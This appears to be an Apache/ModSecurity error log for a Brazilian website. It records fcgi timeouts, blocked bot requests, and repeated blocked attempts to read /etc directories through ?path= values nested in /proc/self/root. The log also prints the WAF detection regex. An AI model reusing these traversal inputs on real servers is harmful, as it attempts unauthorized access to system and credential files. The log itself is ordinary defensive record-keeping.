[Wed Mar 18 20:22:00.103070 2026] [:error] [pid 29882:tid 140411725141760] [client 74.7.228.61:50336] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abszmEzinOy1jxa1j4dgwwAAAQI"]
[Wed Mar 18 20:22:00.917261 2026] [:error] [pid 17887:tid 140411582465792] [client 216.73.216.191:11635] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abszmAkwaGbbGflqUZBWBQAAANM"]
[Wed Mar 18 20:22:46.581782 2026] [proxy_fcgi:error] [pid 14269:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:59050] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:23:08.501899 2026] [proxy_fcgi:error] [pid 11816:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:59202] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:23:31.670121 2026] [proxy_fcgi:error] [pid 17887:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:59438] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:24:05.185849 2026] [proxy_fcgi:error] [pid 9530:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:59470] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:24:34.817788 2026] [proxy_fcgi:error] [pid 11816:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:59548] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:24:57.321916 2026] [proxy_fcgi:error] [pid 31803:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:59670] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:25:24.461281 2026] [:error] [pid 17887:tid 140411557287680] [client 74.7.244.43:35412] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abs0ZAkwaGbbGflqUZBWSQAAANY"]
[Wed Mar 18 20:25:24.773831 2026] [proxy_fcgi:error] [pid 17653:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:59848] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:25:57.796304 2026] [proxy_fcgi:error] [pid 31803:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:59972] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:26:07.731488 2026] [:error] [pid 14269:tid 140411674785536] [client 216.73.216.191:64994] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/etc/euca2ools"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs0jwbLMZ6AikZjR9UCEQAAAAg"]
[Wed Mar 18 20:26:27.881840 2026] [proxy_fcgi:error] [pid 11816:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:60422] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:26:59.849968 2026] [proxy_fcgi:error] [pid 11816:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:60738] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:27:12.970371 2026] [:error] [pid 27293:tid 140411674785536] [client 216.73.216.191:8438] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs00P-YZRR_7pZ7nDI0igAAA8g"]
[Wed Mar 18 20:27:21.802925 2026] [:error] [pid 11816:tid 140411599251200] [client 216.73.216.191:43199] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs02ew_le52K8_3pV0dlQAAAhE"]
[Wed Mar 18 20:27:22.953948 2026] [proxy_fcgi:error] [pid 17887:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:60982] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:27:25.292421 2026] [:error] [pid 11816:tid 140411599251200] [client 216.73.216.191:7898] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs03ew_le52K8_3pV0dmQAAAhE"]
[Wed Mar 18 20:27:29.989278 2026] [:error] [pid 30077:tid 140411565680384] [client 216.73.216.191:44102] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs04fu8EFLIOrSqIptBTQAAAlU"]
[Wed Mar 18 20:27:44.145891 2026] [proxy_fcgi:error] [pid 9800:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:33046] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:27:54.372701 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.228.61:40760] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abs0-sdf6f5d65gmYZQXpwAAAsQ"]
[Wed Mar 18 20:28:31.788312 2026] [proxy_fcgi:error] [pid 17887:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:33146] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:28:51.483594 2026] [:error] [pid 23798:tid 140411716749056] [client 216.73.216.191:27412] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs1Mz-9rzzdA3Ti0NCU7QAAAYM"]
[Wed Mar 18 20:28:53.754547 2026] [:error] [pid 17887:tid 140411582465792] [client 216.73.216.191:18873] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs1NQkwaGbbGflqUZBWfQAAANM"]
[Wed Mar 18 20:28:56.185880 2026] [proxy_fcgi:error] [pid 23798:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:33204] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:29:34.851712 2026] [proxy_fcgi:error] [pid 11816:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:33472] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:30:05.853775 2026] [proxy_fcgi:error] [pid 27293:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:33868] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:30:27.689881 2026] [proxy_fcgi:error] [pid 9333:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:34158] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:30:57.914370 2026] [proxy_fcgi:error] [pid 31803:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:34332] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:31:15.546841 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.244.43:45208] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abs1w8df6f5d65gmYZQYCQAAAsI"]
[Wed Mar 18 20:31:29.025853 2026] [proxy_fcgi:error] [pid 11816:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:34434] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:31:51.091488 2026] [proxy_fcgi:error] [pid 15826:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:34820] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:32:14.041802 2026] [proxy_fcgi:error] [pid 27293:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:35044] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:32:44.281917 2026] [proxy_fcgi:error] [pid 9800:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:35436] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:33:01.497716 2026] [:error] [pid 27403:tid 140411708356352] [client 74.7.228.61:35704] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abs2LRkFeYa1D6dYQnCPZwAAAcQ"]
[Wed Mar 18 20:33:05.117801 2026] [proxy_fcgi:error] [pid 9333:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:35692] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:33:26.061903 2026] [proxy_fcgi:error] [pid 15051:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:35878] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:33:47.513800 2026] [proxy_fcgi:error] [pid 23798:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:36254] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:34:11.433981 2026] [proxy_fcgi:error] [pid 23798:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:36572] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:34:33.116550 2026] [proxy_fcgi:error] [pid 9530:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:37060] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:34:54.049839 2026] [proxy_fcgi:error] [pid 11816:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:37478] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:35:16.121782 2026] [proxy_fcgi:error] [pid 17887:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:37670] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:35:37.045841 2026] [proxy_fcgi:error] [pid 11816:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:37754] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:35:58.218793 2026] [proxy_fcgi:error] [pid 26799:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:38080] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:36:10.211657 2026] [:error] [pid 27293:tid 140411674785536] [client 216.73.216.191:50848] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs26v-YZRR_7pZ7nDI0zQAAA8g"]
[Wed Mar 18 20:36:21.133897 2026] [proxy_fcgi:error] [pid 27293:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:38578] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:36:30.918182 2026] [:error] [pid 27403:tid 140411574073088] [client 74.7.244.43:43516] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abs2_hkFeYa1D6dYQnCP1wAAAdQ"]
[Wed Mar 18 20:36:45.124279 2026] [proxy_fcgi:error] [pid 15826:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:39024] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:37:07.078754 2026] [proxy_fcgi:error] [pid 27403:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:39254] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:37:28.137831 2026] [proxy_fcgi:error] [pid 17653:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:39544] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:37:50.069982 2026] [proxy_fcgi:error] [pid 26799:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:39796] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:38:07.717621 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.228.61:37536] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abs3X9a6ubjKNq_cu4bekgAAA1E"]
[Wed Mar 18 20:38:14.131309 2026] [proxy_fcgi:error] [pid 29882:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:40012] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:38:33.575634 2026] [:error] [pid 31803:tid 140411540502272] [client 74.7.243.128:35992] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs3eeyqAr6etmhZHNoLeAAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 20:38:36.145811 2026] [proxy_fcgi:error] [pid 9530:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:40246] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:38:58.122700 2026] [proxy_fcgi:error] [pid 31803:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:40498] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:39:20.125907 2026] [proxy_fcgi:error] [pid 23798:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:40724] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:39:42.125846 2026] [proxy_fcgi:error] [pid 30077:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:41054] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:40:03.137777 2026] [proxy_fcgi:error] [pid 9333:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:41506] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:40:26.137773 2026] [proxy_fcgi:error] [pid 26799:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:42030] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:40:54.133627 2026] [proxy_fcgi:error] [pid 9333:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:42378] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:41:16.129366 2026] [proxy_fcgi:error] [pid 17887:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:42652] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:41:16.961767 2026] [:error] [pid 9333:tid 140411599251200] [client 74.7.243.128:44558] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs4HA_eYRmh974Uj6QGvgAAApE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 20:41:35.016376 2026] [:error] [pid 27403:tid 140411616036608] [client 74.7.244.43:53004] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abs4LhkFeYa1D6dYQnCP-wAAAc8"]
[Wed Mar 18 20:41:38.132322 2026] [proxy_fcgi:error] [pid 26799:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:42918] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:41:47.473589 2026] [:error] [pid 11816:tid 140411557287680] [client 74.7.243.128:32808] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs4Ouw_le52K8_3pV0ecwAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 20:41:59.125843 2026] [proxy_fcgi:error] [pid 9800:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:43220] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:42:22.033890 2026] [proxy_fcgi:error] [pid 29882:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:43596] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:42:47.625799 2026] [proxy_fcgi:error] [pid 27293:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:43982] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:43:14.238012 2026] [proxy_fcgi:error] [pid 29882:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:44538] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:43:19.377809 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.228.61:50826] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abs4l9a6ubjKNq_cu4bfNQAAA1g"]
[Wed Mar 18 20:43:38.054322 2026] [proxy_fcgi:error] [pid 15051:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:45178] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:44:00.129814 2026] [proxy_fcgi:error] [pid 14269:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:45754] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:44:24.129801 2026] [proxy_fcgi:error] [pid 15051:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:46284] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:44:50.077092 2026] [proxy_fcgi:error] [pid 29882:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:46808] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:44:53.057340 2026] [mime_magic:error] [pid 15826:tid 140411632822016] (70014)End of file found: [client 57.141.18.62:48092] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 20:45:15.097834 2026] [proxy_fcgi:error] [pid 17653:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:47334] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:45:38.121261 2026] [proxy_fcgi:error] [pid 30077:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:47814] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:46:00.069833 2026] [proxy_fcgi:error] [pid 9800:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:48228] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:46:23.117972 2026] [proxy_fcgi:error] [pid 29882:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:48654] AH01075: Error dispatching request to : (polling)
